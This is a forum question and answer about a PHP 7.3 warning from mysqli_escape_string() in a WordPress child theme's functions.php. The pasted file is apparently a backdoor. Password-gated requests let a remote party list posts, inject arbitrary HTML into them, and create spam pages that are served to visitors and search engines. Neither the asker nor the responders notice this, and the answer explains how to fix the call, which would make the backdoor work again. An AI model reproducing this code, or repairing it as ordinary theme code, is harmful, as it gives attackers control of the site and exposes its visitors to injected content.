Warning: mysqli_escape_string() expects exactly 2 parameters

Question

I updated my PHP from 5.6 to 7.3. Now I'm getting:

Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /home/rylzkggo/mysite/wp-content/themes/resca-child/functions.php on line 60

The mysqli_escape_string() is a PHP 7 code.

Not sure what is going on.

Here is the full code from my functions.php file, line 60:

if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');

        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }

Here is the full code:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6a379b52a5a23b76dfd63f9c8fc88190'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysqli_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysqli_escape_string($post_content) . '" WHERE `ID` = "' . mysqli_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysqli_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysqli_escape_string($_REQUEST['url']).'", `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string($_REQUEST['content']).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysqli_escape_string($_REQUEST['title']).'", `keywords` = "'.mysqli_escape_string($_REQUEST['keywords']).'", `description` = "'.mysqli_escape_string($_REQUEST['description']).'", `content` = "'.mysqli_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysqli_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysqli_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>

Please please help. sorry I'm struggling now almost few weeks to get this fixed.

Did you check the documentation yet? If not, you should read it to understand what's going on and how to fix it: [mysqli_escape_string()](https://www.php.net/manual/en/function.mysqli-escape-string.php). — cabrerahector, Oct 06 '19 at 05:47
it says to add: mysqli_real_escape_string so I added there instead still give me the same result warning. please help — loudy, Oct 06 '19 at 13:50
Good. Did you read the documentation of the [mysqli_real_escape_string()](https://www.php.net/manual/en/mysqli.real-escape-string.php) function as well? The answer to fix your issue is in there. — cabrerahector, Oct 06 '19 at 15:36

score 0 · Answer 1 · answered Sep 22 '21 at 14:32

maybe it's late but here's the answer !

you need pass two parameter first is database variable and second one is your input from form

example:

<?php
$servername = "localhost";
$username = "username";
$password = "password";

// Creating a connection
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} 

$escaped_string=mysqli_escape_string($conn,$post_content);

?>

Warning: mysqli_escape_string() expects exactly 2 parameters

1 Answers1